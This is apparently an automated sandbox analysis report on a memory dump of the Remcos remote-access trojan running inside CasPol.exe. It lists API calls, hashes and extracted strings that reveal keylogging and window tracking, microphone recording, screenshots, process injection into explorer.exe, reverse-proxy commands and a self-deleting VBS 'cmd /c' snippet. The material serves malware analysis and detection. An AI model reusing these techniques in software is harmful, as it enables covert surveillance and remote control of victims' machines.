                                                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                              • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                              • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                              • API String ID: 3795512280-3163867910
                                                                              APIs
                                                                              • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                                              • _free.LIBCMT ref: 004500A6
                                                                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                              • _free.LIBCMT ref: 004500C8
                                                                              • _free.LIBCMT ref: 004500DD
                                                                              • _free.LIBCMT ref: 004500E8
                                                                              • _free.LIBCMT ref: 0045010A
                                                                              • _free.LIBCMT ref: 0045011D
                                                                              • _free.LIBCMT ref: 0045012B
                                                                              • _free.LIBCMT ref: 00450136
                                                                              • _free.LIBCMT ref: 0045016E
                                                                              • _free.LIBCMT ref: 00450175
                                                                              • _free.LIBCMT ref: 00450192
                                                                              • _free.LIBCMT ref: 004501AA
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                              • String ID:
                                                                              • API String ID: 161543041-0
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0041912D
                                                                              • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                                              • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                                              • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                                              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                              • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                              • API String ID: 489098229-65789007
                                                                              APIs
                                                                                • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                              • ExitProcess.KERNEL32 ref: 0040C832
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                              • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                              • API String ID: 1913171305-390638927
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: _free
                                                                              • String ID:
                                                                              • API String ID: 269201875-0
                                                                              APIs
                                                                                • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                                                                              • GetLastError.KERNEL32 ref: 00454A96
                                                                              • __dosmaperr.LIBCMT ref: 00454A9D
                                                                              • GetFileType.KERNEL32(00000000), ref: 00454AA9
                                                                              • GetLastError.KERNEL32 ref: 00454AB3
                                                                              • __dosmaperr.LIBCMT ref: 00454ABC
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                                              • CloseHandle.KERNEL32(?), ref: 00454C26
                                                                              • GetLastError.KERNEL32 ref: 00454C58
                                                                              • __dosmaperr.LIBCMT ref: 00454C5F
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                              • String ID: H
                                                                              • API String ID: 4237864984-2852464175
                                                                              APIs
                                                                              • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                              • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                              • GetForegroundWindow.USER32 ref: 0040A467
                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                              • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                              • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                              • String ID: [${ User has been idle for $ minutes }$]
                                                                              • API String ID: 911427763-3954389425
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 65535$udp
                                                                              • API String ID: 0-1267037602
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                                              • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                                              • __dosmaperr.LIBCMT ref: 004393CD
                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                                              • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                                              • __dosmaperr.LIBCMT ref: 0043940A
                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                                              • __dosmaperr.LIBCMT ref: 0043945E
                                                                              • _free.LIBCMT ref: 0043946A
                                                                              • _free.LIBCMT ref: 00439471
                                                                              Similarity
                                                                              • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                              • String ID:
                                                                              • API String ID: 2441525078-0
                                                                              • Opcode ID: 7d52e2fbbdbfe11ab4c2d7ae9a425497261befc8dca55fd6b38b522b0d4b8486
                                                                              • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                                              • Opcode Fuzzy Hash: 7d52e2fbbdbfe11ab4c2d7ae9a425497261befc8dca55fd6b38b522b0d4b8486
                                                                              • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Eventinet_ntoa
                                                                              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G$
                                                                              • API String ID: 3578746661-2335409004
                                                                              • Opcode ID: 28a73e5b790fca0c7b272f7a4031ed656846135069b23c0b6c9381e5b925d934
                                                                              • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                                                                              • Opcode Fuzzy Hash: 28a73e5b790fca0c7b272f7a4031ed656846135069b23c0b6c9381e5b925d934
                                                                              • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                                                                              APIs
                                                                              • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                              • TranslateMessage.USER32(?), ref: 00404F30
                                                                              • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                              • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                                              • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                              • String ID: CloseChat$DisplayMessage$GetMessage
                                                                              • API String ID: 2956720200-749203953
                                                                              • Opcode ID: 454db755f912fa01c8601e4ef7cf6467bd583855cf95526551994d62d0d02b8f
                                                                              • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                                                                              • Opcode Fuzzy Hash: 454db755f912fa01c8601e4ef7cf6467bd583855cf95526551994d62d0d02b8f
                                                                              • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                              • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                              • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                              • String ID: <$@$@FG$@FG$Temp
                                                                              • API String ID: 1107811701-2245803885
                                                                              • Opcode ID: 9aa80993413a1b3ebcdc5bb8f2da99d78fddc9721480b20f30c3289c8ee1195b
                                                                              • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                                              • Opcode Fuzzy Hash: 9aa80993413a1b3ebcdc5bb8f2da99d78fddc9721480b20f30c3289c8ee1195b
                                                                              • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                              • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406705
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CurrentProcess
                                                                              • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                                              • API String ID: 2050909247-4145329354
                                                                              • Opcode ID: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                              • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                                                                              • Opcode Fuzzy Hash: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                              • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                                                                              APIs
                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                              • String ID:
                                                                              • API String ID: 221034970-0
                                                                              • Opcode ID: 3abd86868e1217ea2d45c9c88d919e3d4f56aa0647f23c1260161372d98c8da3
                                                                              • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                                                                              • Opcode Fuzzy Hash: 3abd86868e1217ea2d45c9c88d919e3d4f56aa0647f23c1260161372d98c8da3
                                                                              • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
                                                                              APIs
                                                                              • _free.LIBCMT ref: 00446DDF
                                                                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                              • _free.LIBCMT ref: 00446DEB
                                                                              • _free.LIBCMT ref: 00446DF6
                                                                              • _free.LIBCMT ref: 00446E01
                                                                              • _free.LIBCMT ref: 00446E0C
                                                                              • _free.LIBCMT ref: 00446E17
                                                                              • _free.LIBCMT ref: 00446E22
                                                                              • _free.LIBCMT ref: 00446E2D
                                                                              • _free.LIBCMT ref: 00446E38
                                                                              • _free.LIBCMT ref: 00446E46
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                              • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                                                                              • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                              • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                                                                              APIs
                                                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DecodePointer
                                                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                              • API String ID: 3527080286-3064271455
                                                                              • Opcode ID: ab61d69453e4831c81f6a46e39f254611e12c2bb616dca0b6d42b24218e76fcf
                                                                              • Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
                                                                              • Opcode Fuzzy Hash: ab61d69453e4831c81f6a46e39f254611e12c2bb616dca0b6d42b24218e76fcf
                                                                              • Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D
                                                                              APIs
                                                                              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                              • Sleep.KERNEL32(00000064), ref: 00416688
                                                                              • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CreateDeleteExecuteShellSleep
                                                                              • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                              • API String ID: 1462127192-2001430897
                                                                              • Opcode ID: 57a3d9700c363e16d92c0a35c53a2666f58ec185e1c8130573b5faa5b1b3f2e0
                                                                              • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                                                                              • Opcode Fuzzy Hash: 57a3d9700c363e16d92c0a35c53a2666f58ec185e1c8130573b5faa5b1b3f2e0
                                                                              • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                                              APIs
                                                                              • _strftime.LIBCMT ref: 00401AD3
                                                                                • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                              • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                              • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                              • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                              • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                              • API String ID: 3809562944-3643129801
                                                                              • Opcode ID: 4e4f26da87869f5af6422ea0e78c3964d23409c8ed5f67b7aa5e9f585ec7fe39
                                                                              • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                                                                              • Opcode Fuzzy Hash: 4e4f26da87869f5af6422ea0e78c3964d23409c8ed5f67b7aa5e9f585ec7fe39
                                                                              • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                                                                              APIs
                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                              • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                              • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                              • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                              • waveInStart.WINMM ref: 00401A81
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                              • String ID: XCG$`=G$x=G
                                                                              • API String ID: 1356121797-903574159
                                                                              • Opcode ID: af02e173f40945dc6bf52b4cf25fd682b2b0044d7a0dcd55ec314a43764efb73
                                                                              • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                                                                              • Opcode Fuzzy Hash: af02e173f40945dc6bf52b4cf25fd682b2b0044d7a0dcd55ec314a43764efb73
                                                                              • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                                                • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                                                                              • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                                                                              • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                                              • TranslateMessage.USER32(?), ref: 0041C9FB
                                                                              • DispatchMessageA.USER32(?), ref: 0041CA05
                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                              • String ID: Remcos
                                                                              • API String ID: 1970332568-165870891
                                                                              • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                              • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                                                                              • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                              • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8724f9862cb7656745f569b65e9253ef66bccdbbb21ca01ab506061567e91e9c
                                                                              • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                                                                              • Opcode Fuzzy Hash: 8724f9862cb7656745f569b65e9253ef66bccdbbb21ca01ab506061567e91e9c
                                                                              • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
                                                                              APIs
                                                                              • GetCPInfo.KERNEL32(?,?), ref: 00452BD6
                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452C59
                                                                              • __alloca_probe_16.LIBCMT ref: 00452C91
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452CEC
                                                                              • __alloca_probe_16.LIBCMT ref: 00452D3B
                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452D03
                                                                                • Part of subcall function 00446AFF: HeapAlloc.KERNEL32(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452D7F
                                                                              • __freea.LIBCMT ref: 00452DAA
                                                                              • __freea.LIBCMT ref: 00452DB6
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
                                                                              • String ID:
                                                                              • API String ID: 3256262068-0
                                                                              • Opcode ID: cde961f71f83e5614e0e0585355dc136788689c58c90c98609e3e8ecc25f0046
                                                                              • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                                                                              • Opcode Fuzzy Hash: cde961f71f83e5614e0e0585355dc136788689c58c90c98609e3e8ecc25f0046
                                                                              • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                                                                              APIs
                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                              • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                                              • _free.LIBCMT ref: 00444714
                                                                              • _free.LIBCMT ref: 0044472D
                                                                              • _free.LIBCMT ref: 0044475F
                                                                              • _free.LIBCMT ref: 00444768
                                                                              • _free.LIBCMT ref: 00444774
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$ErrorLast$_abort_memcmp
                                                                              • String ID: C
                                                                              • API String ID: 1679612858-1037565863
                                                                              • Opcode ID: 073fed261fa285cd6c65459185357f93b396e03b6829dbcf8ce3010cb8f635a5
                                                                              • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                                              • Opcode Fuzzy Hash: 073fed261fa285cd6c65459185357f93b396e03b6829dbcf8ce3010cb8f635a5
                                                                              • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tcp$udp
                                                                              • API String ID: 0-3725065008
                                                                              • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
